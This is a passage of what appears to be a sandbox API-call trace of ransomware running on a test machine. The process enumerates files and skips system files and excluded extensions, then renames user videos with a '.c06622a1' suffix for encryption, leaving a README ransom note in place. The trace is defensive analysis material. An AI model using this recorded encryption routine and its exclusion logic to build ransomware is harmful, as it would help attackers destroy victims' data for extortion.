(_Str1="ics", _Str2="swf") returned -10 [0168.568] wcslen (_String="ics") returned 0x3 [0168.568] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0168.568] wcslen (_String="idx") returned 0x3 [0168.568] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0168.568] wcslen (_String="ldf") returned 0x3 [0168.568] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0168.568] wcslen (_String="lnk") returned 0x3 [0168.568] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0168.568] wcslen (_String="mod") returned 0x3 [0168.568] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0168.568] wcslen (_String="mpa") returned 0x3 [0168.568] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0168.568] wcslen (_String="msc") returned 0x3 [0168.568] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0168.568] wcslen (_String="msp") returned 0x3 [0168.568] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0168.568] wcslen (_String="msstyles") returned 0x8 [0168.568] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0168.568] wcslen (_String="msu") returned 0x3 [0168.568] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0168.568] wcslen (_String="nls") returned 0x3 [0168.568] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0168.568] wcslen (_String="nomedia") returned 0x7 [0168.568] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0168.569] wcslen (_String="ocx") returned 0x3 [0168.569] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0168.569] wcslen (_String="prf") returned 0x3 [0168.569] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0168.569] wcslen (_String="ps1") returned 0x3 [0168.569] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0168.569] wcslen (_String="rom") returned 0x3 [0168.569] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0168.569] wcslen (_String="rtp") returned 0x3 [0168.569] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0168.569] wcslen (_String="scr") returned 0x3 [0168.569] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0168.569] wcslen (_String="shs") returned 0x3 [0168.569] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0168.569] wcslen (_String="spl") returned 0x3 [0168.569] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0168.569] wcslen (_String="sys") returned 0x3 [0168.569] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0168.569] wcslen (_String="theme") returned 0x5 [0168.569] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0168.569] wcslen (_String="themepack") returned 0x9 [0168.569] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0168.569] wcslen (_String="wpx") returned 0x3 [0168.569] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0168.569] wcslen (_String="lock") returned 0x4 [0168.569] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0168.569] wcslen (_String="key") returned 0x3 [0168.570] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0168.570] wcslen (_String="hta") returned 0x3 [0168.570] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0168.570] wcslen (_String="msi") returned 0x3 [0168.570] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0168.570] wcslen (_String="pdb") returned 0x3 [0168.570] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0168.570] wcslen (_String="sqlite") returned 0x6 [0168.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.570] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.570] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.570] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.570] wcscpy (in: _Dest=0x32400ce, _Source="MJ1ddR.swf" | out: _Dest="MJ1ddR.swf") returned="MJ1ddR.swf" [0168.570] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf", dwFileAttributes=0x80) returned 1 [0168.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\mj1ddr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0168.571] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.571] ReadFile (in: hFile=0x19c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.571] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x9554a6e9 [0168.571] RtlComputeCrc32 (PartialCrc=0xa6e9, Buffer=0x32e9a4, Length=0x80) returned 0xe11f9722 [0168.572] RtlComputeCrc32 (PartialCrc=0x9722, Buffer=0x32e9a4, Length=0x80) returned 0xae9105cb [0168.572] RtlComputeCrc32 (PartialCrc=0x5cb, Buffer=0x32e9a4, Length=0x80) returned 0x13c01380 [0168.572] RtlComputeCrc32 (PartialCrc=0x1380, Buffer=0x32e9a4, Length=0x80) returned 0xa4a13b76 [0168.572] CloseHandle (hObject=0x19c) returned 1 [0168.572] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.572] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf" [0168.572] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf") returned 0x41 [0168.572] wcscpy (in: _Dest=0x32500ea, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.572] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\mj1ddr.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\mj1ddr.swf.c06622a1"), dwFlags=0x8) returned 1 [0168.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\MJ1ddR.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\mj1ddr.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0168.575] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0168.575] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3ef0020 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d9cbc6 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2f1e27f4 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x785f3235 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38e1501a [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b23620a [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b661806 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55ba6e77 [0168.583] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f254ba6 [0168.586] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3ef0094, Length=0x80) returned 0x9fc1b663 [0168.586] RtlComputeCrc32 (PartialCrc=0xb663, Buffer=0x3ef0094, Length=0x80) returned 0xe2ecc70c [0168.586] RtlComputeCrc32 (PartialCrc=0xc70c, Buffer=0x3ef0094, Length=0x80) returned 0xad949f6a [0168.586] RtlComputeCrc32 (PartialCrc=0x9f6a, Buffer=0x3ef0094, Length=0x80) returned 0x4779898d [0168.586] RtlComputeCrc32 (PartialCrc=0x898d, Buffer=0x3ef0094, Length=0x80) returned 0xfa8c9b37 [0168.586] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ef0020) returned 1 [0168.586] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.586] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.586] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x921f24e0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x921f24e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x921f24e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0168.586] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0168.586] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da3ef50, ftCreationTime.dwHighDateTime=0x1d5d97f, ftLastAccessTime.dwLowDateTime=0x8023e7d0, ftLastAccessTime.dwHighDateTime=0x1d5e424, ftLastWriteTime.dwLowDateTime=0x8023e7d0, ftLastWriteTime.dwHighDateTime=0x1d5e424, nFileSizeHigh=0x0, nFileSizeLow=0x15b6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="UFgJgs53B5nyN.mp4", cAlternateFileName="UFGJGS~1.MP4")) returned 1 [0168.586] _wcsicmp (_Str1="UFgJgs53B5nyN.mp4", _Str2="README.c06622a1.TXT") returned 3 [0168.586] wcsstr (_Str="UFgJgs53B5nyN.mp4", _SubStr="README") returned 0x0 [0168.587] _wcsicmp (_Str1="autorun.inf", _Str2="UFgJgs53B5nyN.mp4") returned -20 [0168.587] wcslen (_String="autorun.inf") returned 0xb [0168.587] _wcsicmp (_Str1="boot.ini", _Str2="UFgJgs53B5nyN.mp4") returned -19 [0168.587] wcslen (_String="boot.ini") returned 0x8 [0168.587] _wcsicmp (_Str1="bootfont.bin", _Str2="UFgJgs53B5nyN.mp4") returned -19 [0168.587] wcslen (_String="bootfont.bin") returned 0xc [0168.587] _wcsicmp (_Str1="bootsect.bak", _Str2="UFgJgs53B5nyN.mp4") returned -19 [0168.587] wcslen (_String="bootsect.bak") returned 0xc [0168.587] _wcsicmp (_Str1="desktop.ini", _Str2="UFgJgs53B5nyN.mp4") returned -17 [0168.587] wcslen (_String="desktop.ini") returned 0xb [0168.587] _wcsicmp (_Str1="iconcache.db", _Str2="UFgJgs53B5nyN.mp4") returned -12 [0168.587] wcslen (_String="iconcache.db") returned 0xc [0168.587] _wcsicmp (_Str1="ntldr", _Str2="UFgJgs53B5nyN.mp4") returned -7 [0168.587] wcslen (_String="ntldr") returned 0x5 [0168.587] _wcsicmp (_Str1="ntuser.dat", _Str2="UFgJgs53B5nyN.mp4") returned -7 [0168.587] wcslen (_String="ntuser.dat") returned 0xa [0168.587] _wcsicmp (_Str1="ntuser.dat.log", _Str2="UFgJgs53B5nyN.mp4") returned -7 [0168.587] wcslen (_String="ntuser.dat.log") returned 0xe [0168.587] _wcsicmp (_Str1="ntuser.ini", _Str2="UFgJgs53B5nyN.mp4") returned -7 [0168.587] wcslen (_String="ntuser.ini") returned 0xa [0168.587] _wcsicmp (_Str1="thumbs.db", _Str2="UFgJgs53B5nyN.mp4") returned -1 [0168.587] wcslen (_String="thumbs.db") returned 0x9 [0168.587] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.587] wcslen (_String="386") returned 0x3 [0168.587] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.587] wcslen (_String="adv") returned 0x3 [0168.587] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.587] wcslen (_String="ani") returned 0x3 [0168.588] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.588] wcslen (_String="bat") returned 0x3 [0168.588] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.588] wcslen (_String="bin") returned 0x3 [0168.588] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.588] wcslen (_String="cab") returned 0x3 [0168.588] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.588] wcslen (_String="cmd") returned 0x3 [0168.588] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.588] wcslen (_String="com") returned 0x3 [0168.588] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.588] wcslen (_String="cpl") returned 0x3 [0168.588] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.588] wcslen (_String="cur") returned 0x3 [0168.588] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.588] wcslen (_String="deskthemepack") returned 0xd [0168.588] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.588] wcslen (_String="diagcab") returned 0x7 [0168.588] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.588] wcslen (_String="diagcfg") returned 0x7 [0168.588] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.588] wcslen (_String="diagpkg") returned 0x7 [0168.588] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.588] wcslen (_String="dll") returned 0x3 [0168.588] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.588] wcslen (_String="drv") returned 0x3 [0168.588] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.588] wcslen (_String="exe") returned 0x3 [0168.588] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.588] wcslen (_String="hlp") returned 0x3 [0168.589] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.589] wcslen (_String="icl") returned 0x3 [0168.589] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.589] wcslen (_String="icns") returned 0x4 [0168.589] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.589] wcslen (_String="ico") returned 0x3 [0168.589] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.589] wcslen (_String="ics") returned 0x3 [0168.589] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.589] wcslen (_String="idx") returned 0x3 [0168.589] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.589] wcslen (_String="ldf") returned 0x3 [0168.589] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.589] wcslen (_String="lnk") returned 0x3 [0168.589] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.589] wcslen (_String="mod") returned 0x3 [0168.589] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.589] wcslen (_String="mpa") returned 0x3 [0168.589] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.589] wcslen (_String="msc") returned 0x3 [0168.589] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.589] wcslen (_String="msp") returned 0x3 [0168.589] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.589] wcslen (_String="msstyles") returned 0x8 [0168.589] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.589] wcslen (_String="msu") returned 0x3 [0168.589] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.589] wcslen (_String="nls") returned 0x3 [0168.589] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.590] wcslen (_String="nomedia") returned 0x7 [0168.590] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.590] wcslen (_String="ocx") returned 0x3 [0168.590] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.590] wcslen (_String="prf") returned 0x3 [0168.590] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.590] wcslen (_String="ps1") returned 0x3 [0168.590] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.590] wcslen (_String="rom") returned 0x3 [0168.590] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.590] wcslen (_String="rtp") returned 0x3 [0168.590] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.590] wcslen (_String="scr") returned 0x3 [0168.590] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.590] wcslen (_String="shs") returned 0x3 [0168.590] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.590] wcslen (_String="spl") returned 0x3 [0168.590] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.590] wcslen (_String="sys") returned 0x3 [0168.590] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.590] wcslen (_String="theme") returned 0x5 [0168.590] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.590] wcslen (_String="themepack") returned 0x9 [0168.590] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.590] wcslen (_String="wpx") returned 0x3 [0168.590] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.590] wcslen (_String="lock") returned 0x4 [0168.590] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.590] wcslen (_String="key") returned 0x3 [0168.591] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.591] wcslen (_String="hta") returned 0x3 [0168.591] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.591] wcslen (_String="msi") returned 0x3 [0168.591] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.591] wcslen (_String="pdb") returned 0x3 [0168.591] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.591] wcslen (_String="sqlite") returned 0x6 [0168.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg")) returned 0x10 [0168.591] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.591] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG" [0168.591] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG") returned 0x36 [0168.591] wcscpy (in: _Dest=0x32400ce, _Source="UFgJgs53B5nyN.mp4" | out: _Dest="UFgJgs53B5nyN.mp4") returned="UFgJgs53B5nyN.mp4" [0168.591] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4", dwFileAttributes=0x80) returned 1 [0168.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\ufgjgs53b5nyn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0168.592] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.592] ReadFile (in: hFile=0x1e0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.593] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xaa78d554 [0168.593] RtlComputeCrc32 (PartialCrc=0xd554, Buffer=0x32e9a4, Length=0x80) returned 0x66f315e6 [0168.593] RtlComputeCrc32 (PartialCrc=0x15e6, Buffer=0x32e9a4, Length=0x80) returned 0x2b9e2f72 [0168.593] RtlComputeCrc32 (PartialCrc=0x2f72, Buffer=0x32e9a4, Length=0x80) returned 0xd7487655 [0168.593] RtlComputeCrc32 (PartialCrc=0x7655, Buffer=0x32e9a4, Length=0x80) returned 0xdedaf0ae [0168.593] CloseHandle (hObject=0x1e0) returned 1 [0168.593] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.593] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4" [0168.593] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4") returned 0x48 [0168.593] wcscpy (in: _Dest=0x32500f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.593] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\ufgjgs53b5nyn.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\ufgjgs53b5nyn.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SWQjmzX2VptJG\\UFgJgs53B5nyN.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\swqjmzx2vptjg\\ufgjgs53b5nyn.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e0 [0168.596] CreateIoCompletionPort (FileHandle=0x1e0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.596] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3f80020 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ba5ea9b [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x762a3875 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x26942de6 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15fcd1b1 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77831b09 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6cc5ae62 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x474fdb37 [0168.612] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f60ae0a [0168.616] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3f80094, Length=0x80) returned 0x709358fa [0168.616] RtlComputeCrc32 (PartialCrc=0x58fa, Buffer=0x3f80094, Length=0x80) returned 0xe81b88e1 [0168.616] RtlComputeCrc32 (PartialCrc=0x88e1, Buffer=0x3f80094, Length=0x80) returned 0xdf3697b7 [0168.616] RtlComputeCrc32 (PartialCrc=0x97b7, Buffer=0x3f80094, Length=0x80) returned 0xe983e4e0 [0168.616] RtlComputeCrc32 (PartialCrc=0xe4e0, Buffer=0x3f80094, Length=0x80) returned 0x34d4acae [0168.616] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3f80020) returned 1 [0168.616] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.616] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.616] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecb4740, ftCreationTime.dwHighDateTime=0x1d5df43, ftLastAccessTime.dwLowDateTime=0x85fbc00, ftLastAccessTime.dwHighDateTime=0x1d5e2fe, ftLastWriteTime.dwLowDateTime=0x85fbc00, ftLastWriteTime.dwHighDateTime=0x1d5e2fe, nFileSizeHigh=0x0, nFileSizeLow=0x7951, dwReserved0=0x0, dwReserved1=0x0, cFileName="x5Lo x.mp4", cAlternateFileName="X5LOX~1.MP4")) returned 1 [0168.616] _wcsicmp (_Str1="x5Lo x.mp4", _Str2="README.c06622a1.TXT") returned 6 [0168.616] wcsstr (_Str="x5Lo x.mp4", _SubStr="README") returned 0x0 [0168.616] _wcsicmp (_Str1="autorun.inf", _Str2="x5Lo x.mp4") returned -23 [0168.616] wcslen (_String="autorun.inf") returned 0xb [0168.616] _wcsicmp (_Str1="boot.ini", _Str2="x5Lo x.mp4") returned -22 [0168.616] wcslen (_String="boot.ini") returned 0x8 [0168.616] _wcsicmp (_Str1="bootfont.bin", _Str2="x5Lo x.mp4") returned -22 [0168.616] wcslen (_String="bootfont.bin") returned 0xc [0168.616] _wcsicmp (_Str1="bootsect.bak", _Str2="x5Lo x.mp4") returned -22 [0168.616] wcslen (_String="bootsect.bak") returned 0xc [0168.616] _wcsicmp (_Str1="desktop.ini", _Str2="x5Lo x.mp4") returned -20 [0168.616] wcslen (_String="desktop.ini") returned 0xb [0168.616] _wcsicmp (_Str1="iconcache.db", _Str2="x5Lo x.mp4") returned -15 [0168.616] wcslen (_String="iconcache.db") returned 0xc [0168.617] _wcsicmp (_Str1="ntldr", _Str2="x5Lo x.mp4") returned -10 [0168.617] wcslen (_String="ntldr") returned 0x5 [0168.617] _wcsicmp (_Str1="ntuser.dat", _Str2="x5Lo x.mp4") returned -10 [0168.617] wcslen (_String="ntuser.dat") returned 0xa [0168.617] _wcsicmp (_Str1="ntuser.dat.log", _Str2="x5Lo x.mp4") returned -10 [0168.617] wcslen (_String="ntuser.dat.log") returned 0xe [0168.617] _wcsicmp (_Str1="ntuser.ini", _Str2="x5Lo x.mp4") returned -10 [0168.617] wcslen (_String="ntuser.ini") returned 0xa [0168.617] _wcsicmp (_Str1="thumbs.db", _Str2="x5Lo x.mp4") returned -4 [0168.617] wcslen (_String="thumbs.db") returned 0x9 